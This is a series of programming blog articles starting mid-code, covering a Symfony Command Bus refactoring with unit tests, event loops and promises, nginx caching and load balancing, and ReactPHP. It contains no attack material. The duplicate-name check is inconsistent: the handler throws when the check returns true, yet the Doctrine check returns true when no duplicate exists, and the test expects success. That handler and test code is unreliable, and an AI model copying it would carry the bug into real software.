SaveNewProfile $saveNewProfile
) {
$this->checkProfileNameDuplicates = $checkProfileNameDuplicates;
$this->saveNewProfile = $saveNewProfile;
}
public function handle(CreateNewProfile $createNewProfile)
{
$name = $createNewProfile->name;
if (true === $this->checkProfileNameDuplicates->check($name)) {
throw new \DomainException("Invalid \"name\" parameter: \"$name\" already exists and duplicates are not allowed");
}
$newProfile = new Profile($name); // Entity moved to Profile namespace
$this->saveNewProfile->save($newProfile);
return $newProfile;
}
}
In this way, it becomes much easier to write a unit test:
<?php
// File: tests/AppBundle/Profile/CreateNewProfileHandlerTest.php;
namespace tests\AppBundle\Profile;
use AppBundle\Profile\CreateNewProfile;
use AppBundle\Profile\CreateNewProfileHandler;
use AppBundle\Profile\Profile;
use AppBundle\Profile\Service\CheckProfileNameDuplicates;
use AppBundle\Profile\Service\SaveNewProfile;
use Prophecy\Argument;
class CreateNewProfileHandlerTest extends \PHPUnit_Framework_TestCase
{
const NAME = 'Arthur Dent';
private $checkProfileNameDuplicates;
private $saveNewProfile;
private $createNewProfileHandler;
protected function setUp()
{
$this->checkProfileNameDuplicates = $this->prophesize(CheckProfileNameDuplicates::class);
$this->saveNewProfile = $this->prophesize(SaveNewProfile::class);
$this->createNewProfileHandler = new CreateNewProfileHandler(
$this->checkProfileNameDuplicates->reveal(),
$this->saveNewProfile->reveal()
);
}
/**
* @test
*/
public function it_creates_new_profiles()
{
$createNewProfile = new CreateNewProfile(self::NAME);
$this->checkProfileNameDuplicates->check(self::NAME)->willReturn(true);
$this->saveNewProfile->save(Argument::type(Profile::class))->shouldBeCalled();
self::assertInstanceOf(
Profile::class,
$this->createNewProfileHandler->handle($createNewProfile)
);
}
/**
* @test
*/
public function it_cannot_create_profiles_with_duplicated_name()
{
$createNewProfile = new CreateNewProfile(self::NAME);
$this->checkProfileNameDuplicates->check(self::NAME)->willReturn(false);
$this->saveNewProfile->save(Argument::type(Profile::class))->shouldNotBeCalled();
$this->expectException(\DomainException::class);
$this->createNewProfileHandler->handle($createNewProfile);
}
}
Doctrine implementations are easy to write, for example CheckProfileNameDuplicates:
<?php
namespace AppBundle\Profile\Bridge;
use AppBundle\Profile\Service\CheckProfileNameDuplicates;
use Doctrine\ORM\EntityManager;
class DoctrineCheckProfileNameDuplicates implements CheckProfileNameDuplicates
{
private $entityManager;
public function __construct(EntityManager $entityManager)
{
$this->entityManager = $entityManager;
}
public function check($name)
{
return null === $this->entityManager->getRepository('AppBundle:Profile')->findOneByName($name);
}
}
With the Command Bus pattern, we've reduced our controller to the following responsibilities:
Our Command allows us to make all input parameters and their requirements explicit (thanks to its unit tests, and by doing simple validation on them).
Our Command Handler allows us to make the actual logic explicit and to highlight its edge cases in tests.
While refactoring our controller, we took the opportunity to use the Dependency Inversion Principle to decouple our code from third-party libraries (Doctrine). This was simply done by introducing interfaces, which have the benefit of providing more explicit names.
The best way to learn how to get the Command part in CQRS right is to start using the Command Bus pattern. And to abuse it, by using it everywhere and returning values from Command Handlers.
Once we feel more at ease with the Command Bus pattern, we can start considering alternative uses:
We might realize that ditching the Command Bus and keeping the Command Handler and the Command can still be beneficial. We also might realize that Commands don't solve our "read" logic...
In the next article, we'll experiment with a "Search Engine" pattern to try to get the Query part of CQRS right!
In the meantime, here are some resources related to Command Bus and CQRS:
Then you're in luck! This article aims at answering the "how" question: we'll explore the implementation details of Event Driven Architecture.
Input / Output (I/O) can refer to Client / Server communication through sockets, for example an HTTP server.
Compared to calculations, I/O is really slow! To understand how this latency can be a performance bottleneck for our applications, we're going to create a simple HTTP server implementation.
In order to do so, we need to make use of some system calls: socket, bind, listen, accept, read, write and close.
From this point clients can ask permission to connect to the socket: they're
going to be queued up until the maximum given to listen is reached, at which
point errors are going to be thrown everywhere.
To prevent this nightmare, our priority will be to keep this queue empty by calling accept: it's going to unqueue the first client and return a new socket dedicated for it, allowing the "server" socket to accept more clients.
At some point the client will send data in the socket: the HTTP Request. We'll need to call read to retrieve it. We usually need to parse the received string, for example to create a Request value object our HTTP application can understand.
The HTTP application could then return a Response value object that we'll need to convert back to string and send it to the client using write.
Finally, once done we can call close to get rid of the client and start accepting more.
If we put everything in a loop that runs forever we can handle one client at a time. Here's an implementation example (written in pseudo language):
# Socket abstracts `socket`, `bind` and `listen`
http_server = new Socket(host, port, max_connections_to_queue)
while true:
http_connection = http_server.accept()
data = http_connection.read()
request = http_request_parse(data)
response = application(request)
http_connection.write((string) response)
http_connection.close()
In our loop, for each request we call 3 I/O operations:
- accept: this call will wait until a new connection is available
- read: this call will wait until some data is sent from the client
- write: this call will wait until the data is sent to the client

That's a lot of waiting! While we wait for data to be sent, more clients can try to connect, be queued and eventually reach the limit.
In other words, waiting is blocking. If only we could do something else while waiting...
Turns out we can, thanks to polling system calls:
- call poll with the collection of sockets to watch
- poll will wait until it detects activity on those, and returns the ones that are ready

As goes the saying: "Polling. If it's not solving all your problems, you simply aren't using enough of it".
Note: There are actually many polling system calls:

- select, a POSIX standard which takes 3 fixed-size bitmaps of sockets (read, write, error)
- poll, another POSIX standard which takes an array of sockets
- epoll, a stateful Linux-specific system call equivalent to select/poll
- kqueue, a stateful BSD-specific (that includes Mac OS) system call equivalent to select/poll
- IOCP, a Windows equivalent to epoll/kqueue

For more information about those, check epoll VS kqueue. In our article, poll will refer to polling in general, not to a specific implementation.
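To make polling concrete, here's a small sketch in Python (whose select module wraps the POSIX call of the same name): with a zero timeout, select returns immediately with only the sockets that actually have data ready, instead of blocking.

```python
import select
import socket

# A connected pair of sockets stands in for a server-side connection
# and its client.
server_side, client_side = socket.socketpair()

# Nothing has been written yet: select with a zero timeout reports no
# readable sockets instead of blocking.
readable, _, _ = select.select([server_side], [], [], 0)
assert readable == []

# Once the client writes, the server side shows up as ready to read.
client_side.sendall(b"GET / HTTP/1.1\r\n\r\n")
readable, _, _ = select.select([server_side], [], [], 1)
assert server_side in readable
print(server_side.recv(1024)[:5])  # b'GET /'

server_side.close()
client_side.close()
```

This is the whole trick behind the event loop below: instead of blocking on one client's read, we block once on poll/select for all sockets at once.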
With this we can change the architecture of our HTTP server:
With this we can change the architecture of our HTTP server:

- when the HTTP server socket is ready, accept it to get an HTTP client socket
- when an HTTP client socket is ready, read it to get its data, write the response, then close the HTTP client socket

Let's change our HTTP server to use poll:
http_server = new Socket(host, port, max_connections_to_queue)
connections = new SocketCollection()
connections.append(http_server)
while true:
connections_ready = poll(connections)
for connection in connections_ready:
if http_server == connection:
http_connection = http_server.accept()
connections.append(http_connection)
else:
data = connection.read()
request = http_request_parse(data)
response = application(request)
connection.write((string) response)
connection.close()
connections.remove(connection)
Now we can see the advantage of polling: while waiting for data to be ready on client sockets, we can now accept more connections on the server socket.
Before we continue, let's refactor our code a bit to abstract away the polling logic:
class EventLoop:
function append(connection, callback):
key = (int) connection
self._connections[key] = connection
self._callbacks[key] = callback
function remove(connection):
key = (int) connection
self._connections.pop(key)
self._callbacks.pop(key)
function run():
while true:
connections_ready = poll(self._connections)
for connection in connections_ready:
key = (int) connection
self._callbacks[key](connection, self)
We've named the class EventLoop: every time something happens (an Event) in
the Loop, we call the appropriate callback. Here's our HTTP server with the
EventLoop:
function handle_http_request(http_connection, event_loop):
data = http_connection.read()
request = http_request_parse(data)
response = application(request)
http_connection.write((string) response)
http_connection.close()
event_loop.remove(http_connection)
function handle_http_connection(http_server, event_loop):
http_connection = http_server.accept()
event_loop.append(http_connection, handle_http_request)
http_server = new Socket(host, port, max_connections_to_queue)
event_loop = new EventLoop()
event_loop.append(http_server, handle_http_connection)
event_loop.run()
In the previous implementation, we couldn't make a distinction between client sockets;
with this refactoring we can split our application even more by waiting for
write to be ready (usually poll is able to distinguish sockets
ready to be read from sockets ready to be written).
If we don't have any connections, our server will spend most of its time waiting. If only we could do something else while waiting...
Polling system calls usually take a timeout argument: if nothing happens for
the given time it's going to return an empty collection.
By combining it with a OneOffScheduler, we can achieve interesting things.
Here's an implementation:
class OneOffScheduler:
function append(interval, callback, arguments):
self._callbacks[interval][] = callback
self._arguments[interval][] = arguments
function lowest_interval():
return self._callbacks.keys().min()
function tick():
for interval, callbacks in self._callbacks:
if time.now() % interval != 0:
continue
for id, callback in callbacks:
arguments = self._arguments[interval][id]
callback(arguments)
self._callbacks[interval].pop(id)
self._arguments[interval].pop(id)
By "ticking" the clock we check if any registered callback is due.
The lowest_interval method will allow us to set a smart timeout for poll
(e.g. no callback will mean no timeout, a callback with 5s interval will mean 5s timeout, etc).
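Here's a runnable Python variant of the sketch above (using due times instead of a modulo on the clock, which is less fragile): each callback fires at most once, and lowest_interval provides the timeout to hand to poll.

```python
import time

class OneOffScheduler:
    """One-off callbacks: each registered callback runs at most once."""

    def __init__(self):
        self._entries = []  # list of (due_time, callback, arguments)

    def append(self, interval, callback, *arguments):
        self._entries.append((time.monotonic() + interval, callback, arguments))

    def lowest_interval(self):
        """Timeout to hand to poll: time until the next callback is due."""
        if not self._entries:
            return None  # no callback means poll can block forever
        return max(0.0, min(due for due, _, _ in self._entries) - time.monotonic())

    def tick(self):
        # Fire every callback whose due time has passed, then forget it.
        now = time.monotonic()
        due_now = [e for e in self._entries if e[0] <= now]
        self._entries = [e for e in self._entries if e[0] > now]
        for _, callback, arguments in due_now:
            callback(*arguments)

scheduler = OneOffScheduler()
fired = []
scheduler.append(0, fired.append, "hello")
scheduler.tick()
print(fired)  # ['hello']
scheduler.tick()
print(fired)  # still ['hello']: one-off callbacks don't repeat
```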
Here's our EventLoop improved with the OneOffScheduler:
class EventLoop:
function constructor():
self.one_off_scheduler = new OneOffScheduler()
function append(connection, callback):
key = (int) connection
self._connections[key] = connection
self._callbacks[key] = callback
function remove(connection):
key = (int) connection
self._connections.pop(key)
self._callbacks.pop(key)
function run():
while true:
timeout = self.one_off_scheduler.lowest_interval()
connections_ready = poll(self._connections, timeout)
for connection in connections_ready:
key = (int) connection
self._callbacks[key](connection, self)
self.one_off_scheduler.tick()
There are many possible Scheduler variants (our OneOffScheduler is just one of them).
As goes the saying: "Scheduler. If it's not solving all your problems, you simply aren't using enough of it".
We're now able to execute actions even if no actual events happened. All we need
is to register in our EventLoop a callback. And in this callback we can also
register a new callback for our EventLoop. And in this callback...
That's a lot of nested callbacks! It might become hard to understand the "flow of execution" of our application: we're used to read "synchronous" code, not "asynchronous" code.
What if I told you there's a way to make "asynchronous" code look like "synchronous" code? One of the ways to do this is to implement Promises:
- we create a Deferrer
- we ask the Deferrer to create a Promise; when doing so, the Deferrer injects into it a resolver callback
- we register an on_fulfilled callback in the Promise
- the Promise calls the injected resolver callback with the given on_fulfilled callback as argument
- the resolver stores the on_fulfilled callback as an attribute in the Deferrer
- later, we tell the Deferrer that we finally got a value
- the Deferrer calls the on_fulfilled callback with the value as argument

As goes the saying: "Callback. If it's not solving all your problems, you simply aren't using enough of it".
Here's an implementation for Deferrer:
class Deferrer:
function promise():
return new Promise(self.resolver)
function resolve(value):
for on_fulfill in self._on_fulfilled:
on_fulfill(value)
function resolver(on_fulfilled):
self._on_fulfilled.append(on_fulfilled)
And for Promise:
class Promise:
function constructor(resolver):
self._resolver = resolver
function then(on_fulfilled):
self._resolver(on_fulfilled)
return new Promise(self._resolver)
And finally here's a basic usage example:
function hello_world(name):
print 'Hello ' + name + '!'
function welcome_world(name):
print 'Welcome ' + name + '!'
deferrer = new Deferrer()
promise = deferrer.promise()
promise.then(hello_world).then(welcome_world)
deferrer.resolve('Igor') # prints `Hello Igor!` and `Welcome Igor!`
With this, we contain the complexity to two classes, the rest of the application becomes easier to read: instead of nesting callbacks we can chain them.
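The same pair, transcribed to runnable Python (method names kept from the sketch above): then re-registers on the same resolver, which is why a single resolve fires every callback in the chain.

```python
class Promise:
    def __init__(self, resolver):
        self._resolver = resolver

    def then(self, on_fulfilled):
        # Hand the callback to the Deferrer, then return a fresh Promise
        # sharing the same resolver so calls can be chained.
        self._resolver(on_fulfilled)
        return Promise(self._resolver)

class Deferrer:
    def __init__(self):
        self._on_fulfilled = []

    def promise(self):
        return Promise(self._resolver)

    def _resolver(self, on_fulfilled):
        self._on_fulfilled.append(on_fulfilled)

    def resolve(self, value):
        # The value finally arrived: notify every registered callback.
        for on_fulfilled in self._on_fulfilled:
            on_fulfilled(value)

def hello_world(name):
    print('Hello ' + name + '!')

def welcome_world(name):
    print('Welcome ' + name + '!')

deferrer = Deferrer()
promise = deferrer.promise()
promise.then(hello_world).then(welcome_world)
deferrer.resolve('Igor')  # prints 'Hello Igor!' then 'Welcome Igor!'
```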
Promise and Deferrer both look neat. But what's the link with our scheduled
EventLoop? Turns out the link is Filesystem.
When it comes to Filesystem, we're actually dealing with "U/O" (uh oh) rather than I/O: filesystem operations have been ranked as the slowest in the latency comparison, and unlike sockets they are blocking.
Thankfully we've got a solution for that: wrapping "blocking" filesystem operations in a class that will simulate a "non-blocking" behavior:
- its methods take the regular arguments (e.g. a filename), and an additional on_fulfilled callback
- the actual blocking call is deferred to a thread pool, which creates a Deferrer and returns a Promise
- we register a Promise callback to add on_fulfilled in the EventLoop, scheduled immediately

Here's an implementation example of such a wrapper:
class NonBlockingFilesystem:
function constructor(event_loop, filesystem, thread_pool):
self._event_loop = event_loop
self._filesystem = filesystem
self._thread_pool = thread_pool
function open(file, on_opened):
promise = self._thread_pool.map(self._filesystem.open, file)
promise.then(lambda file_descriptor: self._on_file_opened(file_descriptor, on_opened))
function _on_file_opened(file_descriptor, on_opened):
self._event_loop.scheduler.append(1, on_opened, file_descriptor)
function read(file_descriptor, on_read):
promise = self._thread_pool.map(self._filesystem.read, file_descriptor)
promise.then(lambda content: self._on_file_read(content, on_read))
function _on_file_read(content, on_read):
self._event_loop.scheduler.append(1, on_read, content)
By deferring actual filesystem operations to threads, our HTTP server can accept more connections and handle more clients while waiting for the call to be ready. The thread pool is usually set up with 4 threads.
As goes the saying: "Threading. If it's not solving all your problems, you simply aren't using enough of it... NOT!".
For once, limits are good. If we put too many threads in the pool, we’ll soon reach another limit: the number of filesystem operations allowed by the kernel. If we increase this limit, we’ll soon reach another limit: the number of filesystem operations physically allowed by the hardware (some people tried it, they ended up with burned disks).
Note: Our server and application are still single-threaded. The use of a
ThreadPool is done in a decoupled way, isolating us from multi-threaded issues.
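The same trick is easy to reproduce with a standard thread pool (here Python's concurrent.futures, whose Future plays the role of the Promise above): the blocking open/read happens in a worker thread, and the calling code only touches the result once the callback fires.

```python
import concurrent.futures
import tempfile

class NonBlockingFilesystem:
    """Simulates non-blocking file reads by deferring them to a thread pool."""

    def __init__(self, thread_pool):
        self._thread_pool = thread_pool

    def read(self, path, on_read):
        # The blocking open/read runs in a worker thread; the caller is
        # free to keep polling sockets in the meantime.
        future = self._thread_pool.submit(self._blocking_read, path)
        future.add_done_callback(lambda f: on_read(f.result()))

    @staticmethod
    def _blocking_read(path):
        with open(path, 'rb') as handle:
            return handle.read()

# The pool is usually kept small (libuv defaults to 4 threads).
with concurrent.futures.ThreadPoolExecutor(max_workers=4) as pool:
    filesystem = NonBlockingFilesystem(pool)
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(b'hello')
    results = []
    filesystem.read(f.name, results.append)
# Leaving the `with` block waits for pending work to finish.
print(results)  # [b'hello']
```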
By "non-blocking I/O", Node.js means that it's using an Event Loop to make use of the network latency to handle multiple clients in parallel.
It's been built with libuv, a low-level C library which embeds in its Event Loop many types of Schedulers and a Thread Pool: it allows it to simulate "non-blocking" behavior by wrapping "blocking" calls (e.g. Filesystem).
Instead of implementing our server in a "sequential" way, like Apache2 does, we can instead implement it with "polling events" in mind: nginx is using this "Event-Driven Architecture" and it allows it to outperform Apache.
Systems built in this way often use Promises, as they help us perceive our "asynchronous" code as "synchronous".
If you're interested to read more on the topic, here are some links:
Note: In the PHP landscape, there are many libraries that allow us to build Event Driven applications:
There's even a PHP Async Interop Group that started researching, to create PHP Standard Recommendations (PSR) for Event Loops, Promises, etc.
TL;DR: Put a reverse proxy (for HTTP caching or load balancing purposes) in front of your application to improve its performance.
HTTP frameworks, such as Symfony, allow us to build applications that have the potential to achieve Super Speed.
We've already seen a first way to do so (by turning it into an HTTP server); another way would be to put a reverse proxy in front of it.
In this article we'll take a Symfony application and demonstrate how to do so using nginx.
Note: those two ways can be combined, or used independently.
The regular PHP application setup is with nginx and PHP-FPM:
sudo apt-get install nginx php7.0-fpm
PHP-FPM is going to run our PHP application in a shared-nothing architecture. We might want it to run with the same user as the CLI one to avoid permission issues:
; /etc/php/7.0/fpm/pool.d/www.conf
; ...
user = foobar
group = foobar
; ...
listen.owner = foobar
listen.group = foobar
; ...
We should probably do the same for nginx:
# /etc/nginx/nginx.conf
user foobar foobar;
# ...
Now we should be ready to set up a virtual host for our application:
# /etc/nginx/sites-available/super-speed-nginx
server {
listen 80;
server_name super-speed-nginx.example.com;
root /home/foobar/super-speed-nginx/web;
location / {
# try to serve file directly, fallback to app.php
try_files $uri /app.php$is_args$args;
}
location ~ ^/app\.php(/|$) {
fastcgi_pass unix:/run/php/php7.0-fpm.sock;
fastcgi_split_path_info ^(.+\.php)(/.*)$;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
# Prevents URIs that include the front controller. This will 404:
# http://domain.tld/app.php/some-path
# Remove the internal directive to allow URIs like this
internal;
}
# Keep your nginx logs with the symfony ones
error_log /home/foobar/super-speed-nginx/var/logs/nginx_error.log;
access_log /home/foobar/super-speed-nginx/var/logs/nginx_access.log;
}
Note:
- fastcgi_pass: the address of the FastCGI server, can be an IP and port (e.g. 127.0.0.1:9000) or a socket
- fastcgi_split_path_info: a regex capturing:
  - the script name (here (.+\.php), a file with the .php extension), used to set $fastcgi_script_name
  - the path info (here (/.*), a URL-like string), used to set $fastcgi_path_info
- include: includes a file (here /etc/nginx/fastcgi_params)
- fastcgi_param: sets a FastCGI parameter (check default values in /etc/nginx/fastcgi_params)
Then we'll make sure it's enabled:
sudo ln -s /etc/nginx/sites-available/super-speed-nginx /etc/nginx/sites-enabled/super-speed-nginx
The only thing missing is a Symfony application! Let's create one using the Standard Edition:
composer create-project symfony/framework-standard-edition super-speed-nginx
cd super-speed-nginx
SYMFONY_ENV=prod SYMFONY_DEBUG=0 composer install -o --no-dev
Finally, we can set up the domain name and restart nginx:
echo '127.0.0.1 super-speed-nginx.example.com' | sudo tee --append /etc/hosts
sudo service nginx restart
Let's check if it works: http://super-speed-nginx.example.com/. If a helpful "Welcome" message is displayed, then everything is fine.
Note: If it doesn't work, check the logs:

- application ones in /home/foobar/super-speed-nginx/var/logs
- nginx ones in /var/log/nginx
- PHP-FPM ones in /var/log/php7.0-fpm.log
Let's have a quick benchmark:
curl 'http://super-speed-nginx.example.com/'
ab -t 10 -c 10 'http://super-speed-nginx.example.com/'
The result:
Compared to Apache2, nginx performs better at serving static files and when under high traffic (see why).
But our main interest here is in nginx's HTTP caching features.
Applications built with HTTP frameworks (e.g. Symfony) benefit from the HTTP cache specification, all they need is to add some headers to their response:
- Cache-Control: max-age=60 will ask caches to keep a copy for 60 seconds after receiving the response
- Expires: Fri, 30 Oct 1998 14:19:41 GMT will ask caches to keep a copy of the response until the given date
- Last-Modified: Tue, 8 Sep 2015 13:35:23 GMT allows caches to keep a copy and check later in the background if there's a more recent "last modified" date
- Etag: a3e455afd allows caches to keep a copy and check later in the background if there's a different "etag" (entity tag)

Note: For more information about those headers, check this HTTP cache article.
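The core decision a cache makes can be sketched in a few lines (Python, deliberately simplified: real HTTP caches per RFC 7234 also honor no-cache, s-maxage, validation with Last-Modified/Etag, and more). A stored copy is fresh while its age stays under max-age:

```python
def is_fresh(cache_control, age_seconds):
    """Crude freshness check: fresh while the copy's age is below max-age.

    Only looks at the `max-age` directive, to illustrate the idea.
    """
    for directive in cache_control.split(','):
        directive = directive.strip()
        if directive.startswith('max-age='):
            return age_seconds < int(directive.split('=', 1)[1])
    return False  # no max-age: don't serve from cache in this sketch

print(is_fresh('public, max-age=60', 20))  # True: 20s old, allowed 60s
print(is_fresh('public, max-age=60', 90))  # False: stale, must revalidate
```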
Since nginx sits between clients (e.g. browsers) and the application, it can act as the cache:
It can even serve stale data when the application is failing (e.g. 500 errors)!
To make use of this feature, we first need to set up nginx:
# /etc/nginx/nginx.conf
# ...
http {
proxy_cache_path /home/foobar/super-speed-nginx/var/nginx levels=1:2 keys_zone=super-speed-nginx:10m max_size=10g inactive=60m use_temp_path=off;
# ...
}
Note:
- levels: sets up the directory depth in the cache folder; 2 is recommended, as putting all files in one directory could slow it down
- keys_zone: sets up an in-memory store for cache keys, to avoid fetching them from the disk (a cache name associated to the memory size to use)
- max_size: sets up the maximum disk size of the cache; when this limit is reached, the least used copies are removed
- inactive: sets up the time after which an unused copy can be removed
- use_temp_path: enables / disables writing cached copies to a temporary path before they're moved to the permanent one; off is recommended to avoid unnecessary filesystem operations
Then we need to edit the virtual host by changing the port from 80 to something
else (e.g. 8042) and add a "cache server" in front of it (the cache server will
listen to port 80, it's the one exposed to clients):
# /etc/nginx/sites-available/super-speed-nginx
server {
listen 80;
server_name super-speed-nginx.example.com;
location / {
proxy_pass http://super-speed-nginx.example.com:8042;
proxy_cache super-speed-nginx;
proxy_cache_key "$scheme://$host$request_uri";
proxy_cache_lock on;
proxy_cache_use_stale updating error timeout http_500 http_502 http_503 http_504;
add_header X-Cache $upstream_cache_status;
}
# Keep your nginx logs with the symfony ones
error_log /home/foobar/super-speed-nginx/var/logs/nginx_cache_error.log;
access_log /home/foobar/super-speed-nginx/var/logs/nginx_cache_access.log;
}
server {
listen 8042;
server_name super-speed-nginx.example.com;
root /home/foobar/super-speed-nginx/web;
location / {
# try to serve file directly, fallback to app.php
try_files $uri /app.php$is_args$args;
}
location ~ ^/app\.php(/|$) {
fastcgi_pass unix:/run/php/php7.0-fpm.sock;
fastcgi_split_path_info ^(.+\.php)(/.*)$;
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
# Prevents URIs that include the front controller. This will 404:
# http://domain.tld/app.php/some-path
# Remove the internal directive to allow URIs like this
internal;
}
# Keep your nginx logs with the symfony ones
error_log /home/foobar/super-speed-nginx/var/logs/nginx_error.log;
access_log /home/foobar/super-speed-nginx/var/logs/nginx_access.log;
}
Note:

- proxy_pass: the address of the server we'd like to forward the requests to
- proxy_cache: sets up the name of the cache; it echoes the one used in keys_zone
- proxy_cache_key: the key used to store the copy (the result is converted to md5)
- proxy_cache_lock: enables / disables concurrent cache writing for a given key
- proxy_cache_use_stale: sets up usage of a stale copy:
  - updating: when the copy is being refreshed
  - error, timeout, http_5**: when the application fails
- add_header: adds a header to the HTTP Response (e.g. the value of $upstream_cache_status, which could be MISS, HIT, EXPIRED, etc.)
Now it's our application's turn. By default Symfony sets a
Cache-Control: no-cache header on all responses. Let's change it:
<?php
// src/AppBundle/Controller/DefaultController.php
namespace AppBundle\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Cache;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
class DefaultController extends Controller
{
/**
* @Route("/", name="homepage")
* @Cache(maxage="20", public=true)
*/
public function indexAction(Request $request)
{
// replace this example code with whatever you need
return $this->render('default/index.html.twig', [
'base_dir' => realpath($this->getParameter('kernel.root_dir').'/..'),
]);
}
}
To apply those changes, restart nginx and clear Symfony's cache:
sudo service nginx restart
bin/console cache:clear -e=prod --no-debug
Now we can check the Response's headers:
curl -I 'http://super-speed-nginx.example.com/'
curl -I 'http://super-speed-nginx.example.com/'
The first one should contain a X-Cache header set to MISS, while the second
one should be set to HIT.
Let's have a quick benchmark:
curl 'http://super-speed-nginx.example.com/'
ab -t 10 -c 10 'http://super-speed-nginx.example.com/'
The result:
That's around 140 times faster than without cache.
In the above examples, we've seen some usage of proxy_pass in nginx. It allows
the proxy to forward the request to an "upstream" server (e.g. PHP-FPM).
By providing many upstream servers for one proxy_pass, we enable nginx's load
balancing which can be useful with the ReactPHP set up from the previous article
for example:
# /etc/nginx/sites-available/super-speed-nginx
upstream backend {
server 127.0.0.1:5500 max_fails=1 fail_timeout=5s;
server 127.0.0.1:5501 max_fails=1 fail_timeout=5s;
server 127.0.0.1:5502 max_fails=1 fail_timeout=5s;
server 127.0.0.1:5503 max_fails=1 fail_timeout=5s;
}
server {
root /home/foobar/bench-sf-standard/web/;
server_name localhost;
location / {
try_files $uri @backend;
}
location @backend {
proxy_pass http://backend;
proxy_next_upstream http_502 timeout error;
proxy_connect_timeout 1;
proxy_send_timeout 5;
proxy_read_timeout 5;
}
}
Note:

- proxy_next_upstream: conditions to satisfy in order to forward the request to another server (here errors and timeouts)
- proxy_connect_timeout: maximum time when trying to connect to an upstream server
- proxy_send_timeout: maximum time when trying to send data to an upstream server
- proxy_read_timeout: maximum time when trying to read data from an upstream server
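The upstream selection sketched above (round-robin by default, skipping servers that failed recently) boils down to something like this Python sketch (hypothetical class; nginx's real balancer also supports weights and counts max_fails per fail_timeout window):

```python
import itertools
import time

class RoundRobinUpstream:
    """Toy round-robin picker that skips servers marked failed for a while."""

    def __init__(self, servers, fail_timeout=5.0):
        self._cycle = itertools.cycle(servers)
        self._count = len(servers)
        self._fail_timeout = fail_timeout
        self._failed_until = {}  # server -> timestamp until which it's skipped

    def mark_failed(self, server):
        # Like max_fails=1 fail_timeout=5s: one failure benches the server.
        self._failed_until[server] = time.monotonic() + self._fail_timeout

    def pick(self):
        # Try each server at most once per pick, skipping failed ones.
        for _ in range(self._count):
            server = next(self._cycle)
            if self._failed_until.get(server, 0) <= time.monotonic():
                return server
        raise RuntimeError('no upstream server available')

upstream = RoundRobinUpstream(['127.0.0.1:5500', '127.0.0.1:5501', '127.0.0.1:5502'])
print(upstream.pick())  # 127.0.0.1:5500
upstream.mark_failed('127.0.0.1:5501')
print(upstream.pick())  # 127.0.0.1:5502: the failed server is skipped
```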
With a reverse proxy such as nginx, we can decrease the number of calls to our applications by:
This results in a drastic reduction of response time from the point of view of the client.
Resources:
TL;DR: Run your application as an HTTP server to improve its performance.
HTTP frameworks, such as Symfony, allow us to build applications that have the potential to achieve Super Speed.
A first way to make use of it is to run our application as an HTTP server. In this article we'll take a Symfony application and demonstrate how to run it as an HTTP server using ReactPHP.
We're going to use ReactPHP's HTTP component:
composer require react/http:^0.5@dev
It helps us build HTTP servers:
#!/usr/bin/env php
<?php
// bin/react.php
require __DIR__.'/../vendor/autoload.php';
$loop = React\EventLoop\Factory::create();
$socket = new React\Socket\Server($loop);
$http = new React\Http\Server($socket);
$callback = function ($request, $response) {
};
$http->on('request', $callback);
$socket->listen(1337);
$loop->run();
Starting from the last line, we have:

- $loop->run(): makes our HTTP server run inside an infinite loop (that's how long running processes work)
- $socket->listen(1337): opens a socket by listening to a port (that's how servers work)
- $http->on('request', $callback): for each HTTP Request received, executes the given callback

Note: HTTP servers usually use port 80, but nothing prevents us from using a different one. Since there might be some HTTP servers already running on our computers (e.g. Apache or nginx), we'll use 1337 in our examples to avoid conflicts.
The application logic has to be written in the callback. For example, here's how
to write a Hello World!:
#!/usr/bin/env php
<?php
// bin/react.php
require __DIR__.'/../vendor/autoload.php';
$loop = React\EventLoop\Factory::create();
$socket = new React\Socket\Server($loop);
$http = new React\Http\Server($socket);
$callback = function ($request, $response) {
$statusCode = 200;
$headers = array(
'Content-Type: text/plain'
);
$content = 'Hello World!';
$response->writeHead($statusCode, $headers);
$response->end($content);
};
$http->on('request', $callback);
$socket->listen(1337);
$loop->run();
If we run it now:
php bin/react.php
Then we can visit the page at http://localhost:1337/,
and see a Hello World! message: it works!
Let's recreate the same project, but using the Symfony Standard Edition:
composer create-project symfony/framework-standard-edition super-speed
cd super-speed
composer require react/http:^0.5@dev --ignore-platform-reqs
Since Symfony is an HTTP framework, wrapping it inside the callback is quite natural. We only need to:

- convert the ReactPHP Request into a Symfony one
- call the HttpKernelInterface implementation to get a Symfony Response
- convert the Symfony Response back into a ReactPHP one

As we can see, this is quite straightforward:
#!/usr/bin/env php
<?php
// bin/react.php
require __DIR__.'/../app/autoload.php';
$kernel = new AppKernel('prod', false);
$callback = function ($request, $response) use ($kernel) {
$method = $request->getMethod();
$headers = $request->getHeaders();
$query = $request->getQuery();
$content = $request->getBody();
$post = array();
if (in_array(strtoupper($method), array('POST', 'PUT', 'DELETE', 'PATCH')) &&
isset($headers['Content-Type']) && (0 === strpos($headers['Content-Type'], 'application/x-www-form-urlencoded'))
) {
parse_str($content, $post);
}
$sfRequest = new Symfony\Component\HttpFoundation\Request(
$query,
$post,
array(),
array(), // To get the cookies, we'll need to parse the headers
$request->getFiles(),
array(), // Server is partially filled a few lines below
$content
);
$sfRequest->setMethod($method);
$sfRequest->headers->replace($headers);
$sfRequest->server->set('REQUEST_URI', $request->getPath());
if (isset($headers['Host'])) {
$sfRequest->server->set('SERVER_NAME', explode(':', $headers['Host'])[0]);
}
$sfResponse = $kernel->handle($sfRequest);
$response->writeHead(
$sfResponse->getStatusCode(),
$sfResponse->headers->all()
);
$response->end($sfResponse->getContent());
$kernel->terminate($sfRequest, $sfResponse);
};
$loop = React\EventLoop\Factory::create();
$socket = new React\Socket\Server($loop);
$http = new React\Http\Server($socket);
$http->on('request', $callback);
$socket->listen(1337);
$loop->run();
Note: Request conversion code from React to Symfony has been borrowed from M6Web PhpProcessManagerBundle.
And as easy as that, we can run it:
php bin/react.php
Finally we can visit the page at http://localhost:1337/,
and see a helpful Welcome message: it works!
It's now time to check if we've achieved our goal: did we improve performances?
In order to find out, we can first benchmark the regular Symfony application:
SYMFONY_ENV=prod SYMFONY_DEBUG=0 composer install -o --no-dev --ignore-platform-reqs
php -S localhost:1337 -t web&
curl 'http://localhost:1337/app.php/'
ab -c 1 -t 10 'http://localhost:1337/app.php/'
